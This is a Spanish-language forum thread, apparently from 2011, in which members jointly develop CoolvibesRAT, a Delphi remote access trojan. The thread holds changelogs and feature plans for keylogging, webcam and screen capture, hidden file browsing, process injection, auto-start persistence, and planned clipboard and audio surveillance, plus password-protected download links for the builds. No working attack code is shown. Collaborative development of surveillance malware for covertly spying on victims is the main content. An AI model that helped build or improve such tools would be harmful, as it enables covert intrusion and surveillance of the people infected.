• Desarrollo CoolvibesRAT

  • Subforo donde se hara paso a paso un troyano en delphi.
Subforo donde se hara paso a paso un troyano en delphi.
 #283942  por probando
 08 Abr 2011, 21:29
esa es la idea, mejorar las funciones existentes al máximo y corregir los errores que haya.

ya tengo preparado el visor de thumbnails en el listview de los archivos para el próximo update :p así que espero a que publiques tu primero el tuyo
 #283979  por probando
 09 Abr 2011, 00:07
Voy poniendo las novedades que traerá el update 7:

- Opción para buscar archivos en directorios
- La captura de pantalla, los comandos, "buscar archivos" y la captura de webcam se mandan desde threads diferentes.
- Visor de thumbnails en el listview de los archivos
- Visor y modificación de atributos para archivos y carpetas
 #284087  por probando
 09 Abr 2011, 13:02
Unas fotos:

Visor de Thumbnails:
Imagen


Buscando archivos:

Imagen
 #284108  por tk68
 09 Abr 2011, 14:24
El visionado de miniaturas va a quedar muy bien !!!

Estoy terminando de afinar la captura de pantalla:
- Captura de pantalla automática al abrir pestaña Pantalla si está activado Auto-Refrescar
- Solucionando algunos problemas de repintado de Pantalla al cambiar opción Completa (on/off)
- Realineado CheckBox Completa (se metía en el medio de la captura)
- Problemas de repintado al cambiar tamaño form...
- etc. etc.

- Problemas con Keylogger que estoy revisando (no captura pulsaciones)

Cuando afine estos bugs y otros publico la update con el changelog
para que probando añada su nueva update

 #286338  por Unknown
 16 Abr 2011, 19:48
Hola a Todos, siglos sin pasarme por aca. Pues les comento que aunque he estado alejado del desarrollo de este proyecto, hice mi humilde contribución en su momento y me contenta mucho que haya sido retomado, y más aún, que haya sido retomada la versión 0.5 en vez de la 0.6. Opino igual que todos respecto a corregir y agregar verdaderas y útiles funcionalidades y no cosas que en realidad no se usan mucho ni tienen utilidad alguna.

Saludos nuevamente y creo que ahora estaré asomándome por aca mas seguido a ver que otras gratas noticias me encuentro. Felicitaciones y respetos a todos, especialmente a "DSR" y "probando".

Hasta pronto!
Unknown.
 #286660  por DSR!
 18 Abr 2011, 01:11
gracias por pasarte a visitar a tu hijo, despues de todo la version 0.5 esta hecha enteramente por vos.
un gusto verte por casa Unknown, siempre seras bien recibido en Indetectables y mas en esta seccion!
 #286983  por tk68
 18 Abr 2011, 20:29
Aquí traigo el nuevo update

ChangeLog:
Código: Seleccionar todo
Fecha 18/04/2011
Versión: 0.5 Update 6
Modificación de: Tk68
[*] Corregido bug que hacia a las webcams salir duplicadas
[*] Eliminado parpadeo en la captura de webcam
[+] La captura de webcam se hará siempre a tamaño real
[*] Corregido problemas de repintado en la captura de pantalla al cambiar la opción a 'Completa' o cambiar tamaño del formulario
[*] La opción 'Completa' pasa a llamarse 'Tamaño Real' y el CheckBox se alinea correctamente para evitar que se vea en medio de la captura
[+] La opción 'Auto-Refrescar Listados' pasa a llamarse 'Auto-Refrescar'
[+] Si tenemos 'Auto-Refrescar' activado al entrar en Pantalla se realizará la captura de pantalla automáticamente
[+] La captura de pantalla pasa a guardarse con extensión JPG en vez de JPEG
[*] Mejorada estética del keylogger añadiendo un marco
Más que añadir nuevas funcionalidades me he dedicado a pulir algunas cosas
así como al mismo tiempo me hacía poco a poco con el código antes de introducir
mayores cambios


Pass: indetectables.net
(956.44 KiB) Descargado 49 veces
 #286989  por DSR!
 18 Abr 2011, 20:40
gracias por el update Tk68!
habria que ver en el codigo del 0.6b si se puede reusar algunas lineas de codigo, si mal no recuerdo la version esa esta basada en el ultimo update de la 0.4 que en un foro chino la usaron como base de su rat (y que status.0 rescato como una version alternativa del rat para el foro)
 #287481  por probando
 20 Abr 2011, 16:25
En un par de días publicaré la 0.57, más que en el código del servidor está centrada en el cliente:

[+] Nuevas funciones: Buscar y ver thumbnails en listviews
[+] Añadidos pequeñas funciones para mejorar la usabilidad
[+] Cambio en diseño: Unificados algunos tabs

Sobre este último punto posteo unas imágenes para que veáis como queda y si estáis de acuerdo con este último cambio:

Imagen

Imagen

Imagen

Imagen


Mientras tanto también estoy preparando una inyección más eficaz eliminando monitor.dll y inyectando código directamente pero esto aun no esta pulido :p

Saludos
 #287514  por tk68
 20 Abr 2011, 19:30
Agrupar tabs lo veo correcto, aumenta su usabilidad.

Agruparía la Captura de pantalla, webcam y de teclado en un tab llamando Vigilancia
en un futuro iría también la vigilancia del porta-papeles así como del audio.

Agruparía Procesos, Registro, Servicios, Shell y Ventanas en un tab llamado Sistema

De tal manera que quedaría así:
Información, Sistema, Vigilancia y Extra

Las líneas de división de los grid los veo mejor menos marcados (gris muy claro), como estaba
antes, se ve menos recargado.

Las rutas rápidas, la visualización de archivos ocultos lo veo muy útil y necesario.

Sobre la inyección hay que tener mucho cuidado aquí, ya se sabe, se busca estabilidad y compatibilidad
con el mayor número se SO posibles.

Te está quedando de lujo, añadiendo cosas muy muy útiles, solo nos quedaría la opción de búsqueda para
el registro, así como el poder modificar entradas del registro (ahora solo permite el renombrado el la clave final)
con modificar abriría un form que mostraría la clave/valor y podríamos cambiar el nombre, tipo de dato y valor en
cualquier parte del árbol del registro.

En el administrador de archivos no pondría lo de porta-papeles virtual, directamente pondría el cortar, copiar, pegar

De añadir funcionalidades importantes solo añadiría la vigilancia del porta-papeles y del audio, así como un log (registro)
del funcionamiento de Coolvibes (servidores que conectan-desconectan, tiempo, tráfico, errores etc)

Con todo esto ya de base ya solo nos haría ir a los detalles de mejora como mayores modos de auto-start, actualización
de servidores en grupo, más estabilidad, etc, es decir solo detalles útiles

Un sistema de perfiles tampoco lo veo necesario, a la hora de la verdad usamos solo una configuración base la cual
retocamos muy poco a la hora de crear otro server.

No añadiría ya más funcionalidades poco necesarias o que se pueden hacer con herramientas externas que
podemos subir y ejecutar de modo independiente como puede ser los stealer, tampoco nada de cosas inútiles como
downloaders (para esto usamos el administrador de archivos y punto) ni editores de Hosts, abrir webs etc... o de
carácter poco ético como DDoS, o propagadores usb... vamos un sinfin de funcionalidades que solo añaden más
inestabilidad y hace más difícil de mantener las actualizaciones.

Pero esto que he dicho solo es una sugerencia, Coolvibes es de todos.

 #287721  por probando
 21 Abr 2011, 15:33
Nuevo update, ya vamos por el 7

changelog:
Código: Seleccionar todo
Fecha 21/04/2011
Versión: 0.5 Update 7
Modificación de: Anonimo

[+] Agregado thumbnail viewer en el listviewarchivos, utilizando units (AxThumbsDB.pas y Storages.pas) programadas por Alex Konshin
[+] Añadida opción para buscar en carpetas
[*] Arreglados pequeños bugs en diseño que no merece la pena listar
[+] Añadido visor y modificador de atributos para archivos y carpetas
[+] Añadido botón de rutas rápidas en el tabarchivos con los siguientes directorios: Windows, Sistema, Mis documentos, Archivos Recientes, Escritorio y Directorio de instalación de coolvibes
[+] Ahora la captura de pantalla, la de webcam, el envio de offline keylogger y la generación de miniaturas funcionan en otro thread diferente al de los comandos
[+] Se muestra cual es la ventana activa resaltandola en verde en FormControl
[+] Se le agrega un identificador único a cada servidor
[+] Ahora se guarda el tamaño de formcontrol
[+] Añadidas teclas de acceso rápido a FormControl: F5=Refrescar, ESCAPE=Salir
[*] Mejorado manejador de errores en las transferencias
[*] Arreglado bug que hacía que no se desactivaran las webcams y el online keylogger al desconectar
[*] Cambiada la imagen de FormNotifica y eliminados parpadeos
[*] Arreglado bug que permitia a un atacante remoto descargar cualquier archivo del sistema del cliente
[*] Se unifican los tabs (Servidor e Informacion), (Ficheros y transferencias) y (Mensajes y Bromas)
[*] Se hacen pequeños cambios de diseño en la gui
[*] Mejorado el visor avanzado de thumbnails, ahora no deforma las imágenes
[*] Solucionado bug en la shell que hacía que no funcionara si estaba la captura de pantalla activa
[*] Solucionado bug que hacia que no listara directorios que empezasen con "."
[*] Modificado el modo en el que comparte la configuración conectador.exe con coolserver.dll
[*] Cambiada la rutina de inyección, ya no existe monitor.dll 
pass: indetectables.net

En un momento la compilo y la hago publica para verificar que la inyeccion funciona correctamente

Saludos!
Adjuntos
(1003.83 KiB) Descargado 122 veces
 #287729  por probando
 21 Abr 2011, 15:56
tk68 escribió:Agrupar tabs lo veo correcto, aumenta su usabilidad.

Agruparía la Captura de pantalla, webcam y de teclado en un tab llamando Vigilancia
en un futuro iría también la vigilancia del porta-papeles así como del audio.

Agruparía Procesos, Registro, Servicios, Shell y Ventanas en un tab llamado Sistema

De tal manera que quedaría así:
Información, Sistema, Vigilancia y Extra

Las líneas de división de los grid los veo mejor menos marcados (gris muy claro), como estaba
antes, se ve menos recargado.

Las rutas rápidas, la visualización de archivos ocultos lo veo muy útil y necesario.

Sobre la inyección hay que tener mucho cuidado aquí, ya se sabe, se busca estabilidad y compatibilidad
con el mayor número se SO posibles.

Te está quedando de lujo, añadiendo cosas muy muy útiles, solo nos quedaría la opción de búsqueda para
el registro, así como el poder modificar entradas del registro (ahora solo permite el renombrado el la clave final)
con modificar abriría un form que mostraría la clave/valor y podríamos cambiar el nombre, tipo de dato y valor en
cualquier parte del árbol del registro.

En el administrador de archivos no pondría lo de porta-papeles virtual, directamente pondría el cortar, copiar, pegar

De añadir funcionalidades importantes solo añadiría la vigilancia del porta-papeles y del audio, así como un log (registro)
del funcionamiento de Coolvibes (servidores que conectan-desconectan, tiempo, tráfico, errores etc)

Con todo esto ya de base ya solo nos haría ir a los detalles de mejora como mayores modos de auto-start, actualización
de servidores en grupo, más estabilidad, etc, es decir solo detalles útiles

Un sistema de perfiles tampoco lo veo necesario, a la hora de la verdad usamos solo una configuración base la cual
retocamos muy poco a la hora de crear otro server.

No añadiría ya más funcionalidades poco necesarias o que se pueden hacer con herramientas externas que
podemos subir y ejecutar de modo independiente como puede ser los stealer, tampoco nada de cosas inútiles como
downloaders (para esto usamos el administrador de archivos y punto) ni editores de Hosts, abrir webs etc... o de
carácter poco ético como DDoS, o propagadores usb... vamos un sinfin de funcionalidades que solo añaden más
inestabilidad y hace más difícil de mantener las actualizaciones.

Pero esto que he dicho solo es una sugerencia, Coolvibes es de todos.
Las líneas de los grids me parece que se ven tan marcadas por mi theme de windows :p respecto a lo de agrupar tabs quizás habría que hacer una encuesta como se hizo con el logo.

Listo las funciones que faltan por agregar:
- Vigilancia de Audio
- Editar valores registro
- Busqueda en registro
- Viglancia de porta papeles: (quizás se podría introducir en el registro)
- Log cuando algún server se desconecta....


Respecto a las funciones por mejorar me parece que la que más mejora necesita es la del keylogger que no tiene mucha compatibilidad. La verdad que este es el punto flojo de casi todos los troyanos :p

Además podriamos hacerlo multilenguaje y traducirlo a varios idiomas

También dentro de poco tocará cambiar de versión la bautizaremos como 0.6 o como 0.7? como ya existe la 0.6 quizás podría llevar a confusiones


Saludos

------

Ya he encontrado un primer bug XD, las rutas rápidas no funcionan correctamente :p hay que modificar
Sendtext('GORUTA|'+Recibido+'|');
por
Sendtext('GORUTA|'+Recibido+'|'+ENTER);
 #287791  por tk68
 21 Abr 2011, 18:22
probando eres un maquina, se nota que has trabajado muy duro
Ha sido una actualización realmente importante !!!

Bueno le voy a dar un repaso, depuraré los errores que vea y le meteré mano
al keylogger y portapapeles para el siguiente update.

Nos estamos acercando al update 10 y hay que pensar que número de versión le asignaremos
y sobre la agrupación de tabs. Habrá que llegar a un consenso con alguna pequeña encuesta
sobre estos dos últimos temas

Mi proposición sobre la agrupación de tabs sería:
- Información: Servidor y Sistema
- Vigilancia: Pantalla, Webcam, Keylogger, Portapapeles y Audio
- Sistema o Administrador: Procesos, Registro, Servicios, Shell y Ventanas
- Ficheros: Explorador, Transferencias y Buscar
- Extra: Bromas, Mensajes

Mi proposición sobre la versión sería:
- Coolvibes 2011 Update x
cuando se acabe el año si se publica otro update sería Coolvibes 2012 Update 1
y así sucesivamente.

Larga vida a Coolvibes
 #287798  por probando
 21 Abr 2011, 18:45
Te dejo aquí el cliente que acabo de modificar para que lo añadas a tu update :D

Le he agregado gnugettext.pas para poder traducirlo :D

Saludos

PD: Es unicamente el cliente el server es el mismo. Cuando publiques tu update añadire la posibilidad de traducir las strings del server
 #287804  por tk68
 21 Abr 2011, 19:00
probando escribió:Le he agregado gnugettext.pas para poder traducirlo :D
Muy previsor